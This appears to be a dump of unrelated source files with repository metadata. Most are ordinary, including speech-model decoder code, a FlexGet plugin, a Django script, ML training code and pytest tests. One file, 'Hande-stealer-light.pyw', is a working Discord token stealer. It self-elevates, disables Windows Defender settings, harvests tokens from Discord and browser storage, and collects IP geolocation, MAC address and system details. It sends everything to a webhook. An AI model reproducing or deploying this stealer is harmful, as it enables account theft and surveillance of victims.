tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
backward=(dir == 'bwd'),
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type == 'transformer_transducer':
raise NotImplementedError
from neural_sp.models.seq2seq.decoders.transformer_transducer import TrasformerTransducer
decoder = TrasformerTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer
decoder = RNNTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init)
else:
from neural_sp.models.seq2seq.decoders.las import RNNDecoder
decoder = RNNDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.attn_type,
attn_dim=args.attn_dim,
attn_sharpening_factor=args.attn_sharpening_factor,
attn_sigmoid_smoothing=args.attn_sigmoid,
attn_conv_out_channels=args.attn_conv_n_channels,
attn_conv_kernel_size=args.attn_conv_width,
attn_n_heads=args.attn_n_heads,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
ss_prob=args.ss_prob,
ss_type=args.ss_type,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
mbr_weight=args.mbr_weight,
mbr_nbest=args.mbr_nbest,
mbr_softmax_smoothing=args.mbr_softmax_smoothing,
backward=(dir == 'bwd'),
lm_fusion=lm_fusion,
lm_fusion_type=args.lm_fusion_type,
discourse_aware=args.discourse_aware,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init,
mocha_chunk_size=args.mocha_chunk_size,
mocha_adaptive=args.mocha_adaptive,
mocha_1dconv=args.mocha_1dconv,
mocha_quantity_loss_weight=args.mocha_quantity_loss_weight,
mocha_ctc_sync=args.mocha_ctc_sync,
gmm_attn_n_mixtures=args.gmm_attn_n_mixtures,
replace_sos=args.replace_sos,
soft_label_weight=args.soft_label_weight)
return decoder
|
[
"hiro.mhbc@gmail.com"
] |
hiro.mhbc@gmail.com
|
f922cf4ebb4055119a9e0e2468630b05bc1bef64
|
4c156a21245ad414e9495a5f59cf4d4427759255
|
/Hande-stealer-light.pyw
|
bc3b565fbf2f6a752a14e35e78d669b8ef71b666
|
[
"MIT"
] |
permissive
|
simplifies/Hande-Stealer
|
f464bd56695726058d2a6084f6ba6cd7afd33ba6
|
da5244c774e9bf66c5c1870b6cab3d194b4890ff
|
refs/heads/main
| 2023-04-06T07:07:38.471222
| 2021-04-13T10:52:42
| 2021-04-13T10:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,537
|
pyw
|
import os
import re
import platform
import time
import requests
from io import BytesIO
import json
from dhooks import Webhook, Embed, File
from datetime import datetime
import sys
import win32com.shell.shell as shell
from getmac import get_mac_address as gma
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
os.system("powershell.exe -command Add-MpPreference -ExclusionExtension .exe")
os.system("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled")
os.system("powershell.exe -command Set-MpPreference -PUAProtection disable")
hook = Webhook("https://Your Webhook Url") #change this
embed = Embed(
description='Hande-Stealer From Swagkarna! :smiley:',
color=0x5CDBF0,
timestamp='now'
)
image1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'
embed.set_author(name='Author : swagkarna', icon_url=image1)
embed.add_field(name='Github Profile', value='https://github.com/swagkarna')
embed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')
embed.set_footer(text='Happy Hacking', icon_url=image1)
embed.set_thumbnail(image1)
hook.send(embed=embed)
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
time.sleep(1)
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
message = ''
paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
for platform, path in paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
if len(tokens) > 0:
for token in tokens:
message += f'`{token}`\n\n'
else:
message += 'No tokens found.\n'
hook.send(f'{platform}\n{message}')
main()
def stealip():
time = datetime.now().strftime("%H:%M %p")
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
embed.add_field(name=field['name'], value=field['value'], inline=True)
hook.send(embed=embed)
def stealmac():
y = gma()
hook.send("Mac Address : ")
hook.send(y)
stealmac()
def GetSysInfo():
my_system = platform.uname()
hook.send("System Information : ")
hook.send(f"System: {my_system.system}")
hook.send(f"Node Name: {my_system.node}")
hook.send(f"Release: {my_system.release}")
hook.send(f"Version: {my_system.version}")
hook.send(f"Machine: {my_system.machine}")
hook.send(f"Processor: {my_system.processor}")
GetSysInfo()
stealip()
|
[
"noreply@github.com"
] |
simplifies.noreply@github.com
|
f2ae332d7f80b1cdc90b00f90cafce55f4156e08
|
136c4241843a000020062413ad6ff4d6de8bdf58
|
/flexget/plugins/services/myepisodes.py
|
95187a0788efde709113b6c8e52b0f8b0411d974
|
[
"MIT"
] |
permissive
|
ebadenes/Flexget-Origin
|
d580b9d0bcd65999d2bba6a7051ed19713c7792d
|
abc05c8bb99f5241b509c3e403eb399413a60dac
|
refs/heads/master
| 2021-01-16T19:22:39.003993
| 2013-04-29T17:32:32
| 2013-04-29T17:32:32
| 9,701,035
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,693
|
py
|
from __future__ import unicode_literals, division, absolute_import
import logging
import urllib
import urllib2
import re
import cookielib
from datetime import datetime
from sqlalchemy import Column, Integer, String, DateTime
from flexget import schema
from flexget.plugin import register_plugin, DependencyError, PluginWarning
try:
from flexget.plugins.api_tvdb import lookup_series
except ImportError:
raise DependencyError(issued_by='myepisodes', missing='api_tvdb',
message='myepisodes requires the `api_tvdb` plugin')
log = logging.getLogger('myepisodes')
Base = schema.versioned_base('myepisodes', 0)
class MyEpisodesInfo(Base):
__tablename__ = 'myepisodes'
id = Column(Integer, primary_key=True)
series_name = Column(String, unique=True)
myepisodes_id = Column(Integer, unique=True)
updated = Column(DateTime)
def __init__(self, series_name, myepisodes_id):
self.series_name = series_name
self.myepisodes_id = myepisodes_id
self.updated = datetime.now()
def __repr__(self):
return '<MyEpisodesInfo(series_name=%s, myepisodes_id=%s)>' % (self.series_name, self.myepisodes_id)
class MyEpisodes(object):
"""
Marks a series episode as acquired in your myepisodes.com account.
Simple Example:
Most shows are recognized automatically from their TVDBname.
And of course the plugin needs to know your MyEpisodes.com account details.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target
- chuck
Advanced Example:
In some cases, the TVDB name is either not unique or won't even be discovered.
In that case you need to specify the MyEpisodes id manually using the set plugin.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target:
set:
myepisodes_id: 5111
- chuck
How to find the MyEpisodes id: http://matrixagents.org/screencasts/myep_example-20110507-131555.png
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('text', key='username', required=True)
root.accept('text', key='password', required=True)
return root
def on_task_exit(self, task, config):
"""Mark all accepted episodes as acquired on MyEpisodes"""
if not task.accepted:
# Nothing accepted, don't do anything
return
username = config['username']
password = config['password']
cookiejar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
baseurl = urllib2.Request('http://myepisodes.com/login.php?')
loginparams = urllib.urlencode({'username': username,
'password': password,
'action': 'Login'})
try:
logincon = opener.open(baseurl, loginparams)
loginsrc = logincon.read()
except urllib2.URLError as e:
log.error('Error logging in to myepisodes: %s' % e)
return
if str(username) not in loginsrc:
raise PluginWarning(('Login to myepisodes.com failed, please check '
'your account data or see if the site is down.'), log)
for entry in task.accepted:
try:
self.mark_episode(task, entry, opener)
except PluginWarning as w:
log.warning(str(w))
def lookup_myepisodes_id(self, entry, opener, session):
"""Populates myepisodes_id field for an entry, and returns the id.
Call will also set entry field `myepisode_id` if successful.
Return:
myepisode id
Raises:
LookupError if entry does not have field series_name
"""
# Don't need to look it up if we already have it.
if entry.get('myepisodes_id'):
return entry['myepisodes_id']
if not entry.get('series_name'):
raise LookupError('Cannot lookup myepisodes id for entries without series_name')
series_name = entry['series_name']
# First check if we already have a myepisodes id stored for this series
myepisodes_info = session.query(MyEpisodesInfo).\
filter(MyEpisodesInfo.series_name == series_name.lower()).first()
if myepisodes_info:
entry['myepisodes_id'] = myepisodes_info.myepisodes_id
return myepisodes_info.myepisodes_id
# Get the series name from thetvdb to increase match chance on myepisodes
if entry.get('tvdb_series_name'):
query_name = entry['tvdb_series_name']
else:
try:
series = lookup_series(name=series_name, tvdb_id=entry.get('tvdb_id'))
query_name = series.seriesname
except LookupError as e:
log.warning('Unable to lookup series `%s` from tvdb, using raw name.' % series_name)
query_name = series_name
baseurl = urllib2.Request('http://myepisodes.com/search.php?')
params = urllib.urlencode({'tvshow': query_name, 'action': 'Search myepisodes.com'})
try:
con = opener.open(baseurl, params)
txt = con.read()
except urllib2.URLError as e:
log.error('Error searching for myepisodes id: %s' % e)
matchObj = re.search(r'&showid=([0-9]*)">' + query_name + '</a>', txt, re.MULTILINE | re.IGNORECASE)
if matchObj:
myepisodes_id = matchObj.group(1)
db_item = session.query(MyEpisodesInfo).filter(MyEpisodesInfo.myepisodes_id == myepisodes_id).first()
if db_item:
log.info('Changing name to `%s` for series with myepisodes_id %s' %
(series_name.lower(), myepisodes_id))
db_item.series_name = series_name.lower()
else:
session.add(MyEpisodesInfo(series_name.lower(), myepisodes_id))
entry['myepisodes_id'] = myepisodes_id
return myepisodes_id
def mark_episode(self, task, entry, opener):
"""Mark episode as acquired.
Required entry fields:
- series_name
- series_season
- series_episode
Raises:
PluginWarning if operation fails
"""
if 'series_season' not in entry or 'series_episode' not in entry or 'series_name' not in entry:
raise PluginWarning(
'Can\'t mark entry `%s` in myepisodes without series_season, series_episode and series_name fields' %
entry['title'], log)
if not self.lookup_myepisodes_id(entry, opener, session=task.session):
raise PluginWarning('Couldn\'t get myepisodes id for `%s`' % entry['title'], log)
myepisodes_id = entry['myepisodes_id']
season = entry['series_season']
episode = entry['series_episode']
if task.manager.options.test:
log.info('Would mark %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
else:
baseurl2 = urllib2.Request(
'http://myepisodes.com/myshows.php?action=Update&showid=%s&season=%s&episode=%s&seen=0' %
(myepisodes_id, season, episode))
opener.open(baseurl2)
log.info('Marked %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
register_plugin(MyEpisodes, 'myepisodes', api_ver=2)
|
[
"chase.sterling@gmail.com"
] |
chase.sterling@gmail.com
|
2960c363204b3c970270b04ba3da510e16c8b043
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/joshg111/c.py
|
3247ad1bc43608716c4eafcf837e3f50658944a0
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,836
|
py
|
import fileinput
from math import sqrt; from itertools import count, islice
def get_divisor(x):
# Stopping checking for divisors when we hit some pre defined maximum.
#for i in islice(count(2), 1000000):
for i in xrange(2, 1000):
if (x % i) == 0:
# This is the case it is not a prime. Return the divisor.
return i
# This is a prime. Unable to get divisor.
return None
def init(n):
x = 1
for i in xrange(n-1):
x *= 10
return x+1
def gen_num(n):
len_perm = (n - 2)
perms = 2 ** len_perm
formatter = '{:0' + str(len_perm) + 'b}'
for i in xrange(perms):
s = formatter.format(i)
s = '1' + s + '1'
yield s
def output_jam(s, divisors):
f.write(s + " ")
for d in divisors:
f.write(str(d) + " ")
f.write("\n")
def gen_jamcoin(n, j):
jams = 0
g_i = gen_num(n)
while jams < j:
s = g_i.next()
divisors = []
found_jam = True
for b in xrange(2, 11):
# Check all the bases
divisor = get_divisor(long(s, b))
if not divisor:
found_jam = False
break
else:
divisors.append(divisor)
if found_jam:
output_jam(s, divisors)
jams += 1
print "jams = " + str(jams)
f = open('workfile_large', 'w')
if __name__ == "__main__":
i = 1
f_i = fileinput.input()
tests = f_i.next()
for line in f_i:
n, j = map(int, line.split(' '))
f.write("Case #" + str(i) + ":\n")
gen_jamcoin(n, j)
i += 1
f.close()
f_i.close()
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
f3627f85293749abf4bdc02e42166c7f1307955f
|
779c7d032eb8d5a4421b8b236c9004559b70756d
|
/import/drop_cache_tables.py
|
b74d0ed6091fcc4373b1d48df17bf6f274748eb8
|
[] |
no_license
|
corincerami/opus
|
727e91a461a6488f2bc263ca6c98a27a93424228
|
281f246ff5bd703a009ab3bad6271249e0e00bff
|
refs/heads/master
| 2022-11-11T13:46:06.317320
| 2018-01-11T00:33:54
| 2018-01-11T00:33:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,262
|
py
|
"""
drops all tables like 'cache%' in database 'opus'
"""
# Set up the Django Enviroment for running as shell script
import sys
import os
import django
from django.conf import settings
# sys.path.append('/Users/lballard/projects/opus/')
sys.path.append('/home/django/djcode/') #srvr
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opus.settings")
# from opus import settings
# settings.configure(CACHES=settings.CACHES, DATABASES=settings.DATABASES) # include any other settings you might need
django.setup()
# script imports
from os import system
from django.db import transaction, connection, reset_queries
from django.core.management import call_command
from django.db.utils import DatabaseError
from settings import MULT_FIELDS # DATABASES creds only
from secrets import DB_ADMIN, DB_ADMIN_PASS
cursor = connection.cursor()
# forget about it
# from settings_local import opus1, opus_to_deploy # names of the databases
database = 'opus'
# drop cache tables
cursor.execute("show tables in {} like 'cache%'".format(database))
all_cache_tables = [row[0] for row in cursor.fetchall() if row[0]]
for cache_table in all_cache_tables:
q_up = "drop table {}.{}".format(database, cache_table)
cursor.execute(q_up)
print q_up
print "Done!"
|
[
"lballard.cat@gmail.com"
] |
lballard.cat@gmail.com
|
7da477883e2730f6f5c070b0800fb4dc3f8c6687
|
c3a76533d1fbb53f291f49fb95b5e89ed69a75f5
|
/amazon_mianjing/isomorphicString.py
|
19372b8e2e48d6bd81616dac258d4ef20febecc3
|
[] |
no_license
|
jing1988a/python_fb
|
5feb68efd32bd63952b4df0c0cd2e766b83451ea
|
fd310ec0a989e003242f1840230aaac150f006f0
|
refs/heads/master
| 2020-03-28T21:03:19.375549
| 2019-01-31T17:02:17
| 2019-01-31T17:02:17
| 149,125,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
# 给你一个list word 你把所有isomorphic group的word分到一起
# isomorphic string的意思是string a 到string b 里面有每一个char都是one to one relationship
# 比如 aba 和cmc是isomorphic 但是aba 和ccc 就不是
# eg: {abba, cppc, abc, emf, bbbb, m} => {{abba, cppc}, {abc, emf}, {bbbb}, {m}}
import collections
class Problem:
def solve(self , words):
# assume no duplicate in words? not case censitive??
d=collections.defaultdict(list)
for w in set(words):
d[self.getPattern(w)].append(w)
return d.values()
def getPattern(self , w):
words=list('qwertyuiopasdfghjklzxcvbnm')
ctoP=dict()
pattern=[]
for c in w:
if c not in ctoP:
p=words.pop()
ctoP[c]=p
pattern.append(ctoP[c])
return ''.join(pattern)
test=Problem()
print(test.solve(['abba', 'cppc', 'abc', 'emf', 'bbbb', 'm']))
|
[
"jing1988a@gmail.com"
] |
jing1988a@gmail.com
|
7d85cf8e793d99257d0ce79b6ec1c76a761f0006
|
a37b756e34fc39c1237fc68997dbef77df9fa6fc
|
/dacon/1_articles/dacon_classify_articles_1.py
|
e5e5f197a6da6982360718465da885fd45e7c8be
|
[] |
no_license
|
jvd2n/ai-study
|
e20e38493ad295940a3201fc0cc8061ca9052607
|
a82f7c6d89db532f881c76b553b5ab3eea0bdd59
|
refs/heads/main
| 2023-08-06T03:24:39.182686
| 2021-10-06T14:41:01
| 2021-10-06T14:41:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,836
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from icecream import ic
# Data
PATH = './dacon/news/'
train = pd.read_csv(PATH + 'train_data.csv')
test = pd.read_csv(PATH + 'test_data.csv')
submission = pd.read_csv(PATH + 'sample_submission.csv')
ic(train, test, submission)
ic(train.shape, test.shape) # (45654, 3) (9131, 2)
train['doc_len'] = train.title.apply(lambda words: len(words.split()))
ic(train['doc_len'].max())
x_train = np.array([x for x in train['title']])
x_test = np.array([x for x in test['title']])
y_train = np.array([x for x in train['topic_idx']])
ic(x_train, x_test, y_train)
ic(x_train.shape, x_test.shape, y_train.shape) # (45654,) (9131,) (45654,)
print("Article's Max Length: ", max(len(i) for i in x_train)) # 44
print("Article's Avg Length: ", sum(map(len, x_train)) / len(x_train)) # 27.33
# plt.hist([len(s) for s in x_train], bins=50)
# plt.show()
# Preprocessing
from tensorflow.keras.preprocessing.text import Tokenizer
# token = Tokenizer(num_words=2000)
token = Tokenizer(num_words=2000)
token.fit_on_texts(x_train)
seq_train = token.texts_to_sequences(x_train)
seq_test = token.texts_to_sequences(x_test)
print(len(seq_train), len(seq_test))
ic(seq_train[:10])
ic(np.unique(seq_train))
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
x_train = pad_sequences(seq_train, padding='pre', maxlen=14)
x_test = pad_sequences(seq_test, padding='pre', maxlen=14)
ic(x_train.shape, x_test.shape) # (45654, 14) (9131, 14)
y_train = to_categorical(y_train)
ic(y_train)
ic(y_train.shape) # (45654, 7)
# Modeling
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Embedding, Bidirectional
from tensorflow.keras.callbacks import EarlyStopping
model = Sequential()
model.add(Embedding(2000, 200, input_length=14))
model.add(Bidirectional(LSTM(units=128, return_sequences=True)))
model.add(Bidirectional(LSTM(units=64, return_sequences=True)))
model.add(Bidirectional(LSTM(units=32)))
model.add(Dense(7, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()
es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=5)
model.fit(x_train, y_train, epochs=50, batch_size=32, validation_split=0.2, callbacks=[es])
y_predict = model.predict(x_test)
ic(y_predict)
# Results make to_csv submissions
ic(len(y_predict))
topic = []
for i in range(len(y_predict)):
topic.append(np.argmax(y_predict[i])) # np.argmax -> 최대값의 색인 위치
submission['topic_idx'] = topic
ic(submission.shape)
import datetime
date_time = datetime.datetime.now().strftime("%y%m%d_%H%M")
submission.to_csv(PATH + 'CLSFY_ATC_SUB_1_' + date_time + '.csv', index=False)
|
[
"juhnmayer@gmail.com"
] |
juhnmayer@gmail.com
|
049a63b08359ef20611b5bbed9f50e22220ea117
|
bbc8192636e0f254ffcb0537306a5bf387235aec
|
/p2/src/test/test_fixtest.py
|
3286780d878dbc2564ccf50eff4d1557ca0526ce
|
[] |
no_license
|
datason/deployml_course
|
99c0034affb66277fef53aca1f903ae93ad3fc12
|
f2817115063bae714b02b16bf2ed64f38f0b99ea
|
refs/heads/main
| 2023-02-06T10:59:57.500638
| 2020-12-30T09:27:04
| 2020-12-30T09:27:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
# up to parent
import sys, os
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
CURROOT = os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import numpy as np
import pandas as pd
import joblib
from src.main.preprocessors import *
from config.config import *
import pytest
# fixture - создает специальный объект для работы в тестах
@pytest.fixture
def params():
N_ESTIMATORS = 32
MAX_DEPTH = 12
MIN_SAMPLES_LEAF = 3
CRITERION = 'mse'
return({"n_estimators" : N_ESTIMATORS,
"max_depth" : MAX_DEPTH,
"min_samples_leaf" : MIN_SAMPLES_LEAF,
"criterion" : CRITERION,
"random_state" : SEED})
@pytest.fixture
def simulated_data():
# можно зафиксировать ожидаемый результат, а не вводные данные
# пример: сохраненный результат predict
dp = r'%s' % os.path.abspath(os.path.join(os.path.dirname("src"), os.pardir, os.pardir, 'data')).replace('\\', '/')
return generate_test_df(DATA_PATH, CLEAN_DATA, 5)
def test_fit(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
data_test1 = simulated_data
#data_test2 = simulated_data
rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
# или использовать pandas.testing.assert_frame_equal
assert np.allclose(rfm.predict(data_test1[MODEL_FEATURES]), rfm.predict(data_test1[MODEL_FEATURES]), rtol= 0.1)
#assert np.allclose(rfm.predict(data_test2[MODEL_FEATURES]), data_test2[TARGET_NAME], rtol= 0.1)
def test_checkfail(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
# Did not raise
#with pytest.raises(ValueError):
# rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
with pytest.raises(TypeError):
rfm.fit(data_train[MODEL_FEATURES], ",".join(data_train[TARGET_NAME]))
|
[
"artseleznev@gmail.com"
] |
artseleznev@gmail.com
|
95cfc91c55e0f76e5468b436c73920eda466e577
|
ab7d6793c9b00b00eae63533bbeffa45a710f690
|
/models/HCN.py
|
7fed678e3d62e686d23a10570581cab5a6e55ec1
|
[] |
no_license
|
subburajs/SLR-1
|
c327090256b267b1877854ee01172fc956946876
|
2fc724303dd530ff46085ae89471f958470e3e14
|
refs/heads/master
| 2023-03-19T21:56:14.061002
| 2020-06-21T16:09:07
| 2020-06-21T16:09:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,307
|
py
|
import torch
import torch.nn as nn
import torchvision
from torchvision import models
from torch.nn import functional as F
class hcn(nn.Module):
def __init__(self,num_class, in_channel=2,
length=32,
num_joint=10,
dropout=0.2):
super(hcn, self).__init__()
self.num_class = num_class
self.in_channel = in_channel
self.length = length
self.num_joint = num_joint
self.conv1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bn1 = nn.BatchNorm2d(64)
self.conv2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bn2 = nn.BatchNorm2d(32)
self.hconv = HierarchyConv()
self.conv4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn4 = nn.BatchNorm2d(64)
self.convm1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bnm1 = nn.BatchNorm2d(64)
self.convm2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bnm2 = nn.BatchNorm2d(32)
self.hconvm = HierarchyConv()
self.convm4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bnm4 = nn.BatchNorm2d(64)
self.conv5 = nn.Sequential(
nn.Conv2d(128,128,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn5 = nn.BatchNorm2d(128)
self.conv6 = nn.Sequential(
nn.Conv2d(128,256,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn6 = nn.BatchNorm2d(256)
# scale related to total number of maxpool layer
scale = 16
self.fc7 = nn.Sequential(
nn.Linear(256*(length//scale)*(32//scale),256),
nn.ReLU(),
nn.Dropout2d(p=dropout)
)
self.fc8 = nn.Linear(256,self.num_class)
def forward(self,input):
output = self.get_feature(input)
output = self.classify(output)
return output
def get_feature(self,input):
# input: N T J D
input = input.permute(0,3,1,2)
N, D, T, J = input.size()
motion = input[:,:,1::,:]-input[:,:,0:-1,:]
motion = F.upsample(motion,size=(T,J),mode='bilinear').contiguous()
out = self.conv1(input)
# out = self.bn1(out)
out = self.conv2(out)
# out = self.bn2(out)
out = out.permute(0,3,2,1).contiguous()
# out: N J T D
# out = self.conv3(out)
out = self.hconv(out)
out = self.conv4(out)
# out = self.bn4(out)
outm = self.convm1(motion)
# outm = self.bnm1(outm)
outm = self.convm2(outm)
# outm = self.bnm2(outm)
outm = outm.permute(0,3,2,1).contiguous()
# outm: N J T D
# outm = self.convm3(outm)
outm = self.hconvm(outm)
outm = self.convm4(outm)
# outm = self.bnm4(outm)
out = torch.cat((out,outm),dim=1)
out = self.conv5(out)
# out = self.bn5(out)
out = self.conv6(out)
# out = self.bn6(out)
# out: N J T(T/16) D
return out
def classify(self,input):
out = input.view(input.size(0),-1)
out = self.fc7(out)
out = self.fc8(out)
t = out
assert not ((t != t).any())# find out nan in tensor
assert not (t.abs().sum() == 0) # find out 0 tensor
# N x C (num_class)
return out
class HierarchyConv(nn.Module):
def __init__(self):
super(HierarchyConv,self).__init__()
self.convla = nn.Conv2d(2,16,3,1,padding=1)
self.convra = nn.Conv2d(2,16,3,1,padding=1)
self.conflh = nn.Conv2d(21,16,3,1,padding=1)
self.confrh = nn.Conv2d(21,16,3,1,padding=1)
self.convf = nn.Conv2d(70,32,3,1,padding=1)
self.convl = nn.Conv2d(32,32,3,1,padding=1)
self.convr = nn.Conv2d(32,32,3,1,padding=1)
self.parts = 3
self.conv = nn.Sequential(
nn.Conv2d(self.parts*32,32,3,1,padding=1),
nn.MaxPool2d(2)
)
# self.bn = nn.BatchNorm2d(32)
def forward(self,input):
left_arm = input[:,[3,4],:,:]
right_arm = input[:,[6,7],:,:]
face = input[:,25:95,:,:]
left_hand = input[:,95:116,:,:]
right_hand = input[:,116:137,:,:]
# left_arm = input[:,[0,1],:,:]
# right_arm = input[:,[2,3],:,:]
# face = input[:,4:74,:,:]
# left_hand = input[:,74:95,:,:]
# right_hand = input[:,95:116,:,:]
l1 = self.convla(left_arm)
r1 = self.convra(right_arm)
l2 = self.conflh(left_hand)
r2 = self.confrh(right_hand)
l = torch.cat([l1,l2],1)
r = torch.cat([r1,r2],1)
l = self.convl(l)
r = self.convr(r)
f = self.convf(face)
